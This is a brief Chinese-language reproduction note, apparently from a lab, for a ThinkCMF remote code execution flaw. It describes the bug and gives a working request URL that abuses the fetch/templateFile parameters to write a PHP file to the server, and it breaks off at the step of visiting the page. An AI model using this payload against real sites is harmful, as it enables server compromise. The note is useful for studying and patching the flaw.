1.漏洞描述
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
2.写入包含文件
http://ip:48769/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
未报错
3.访问页面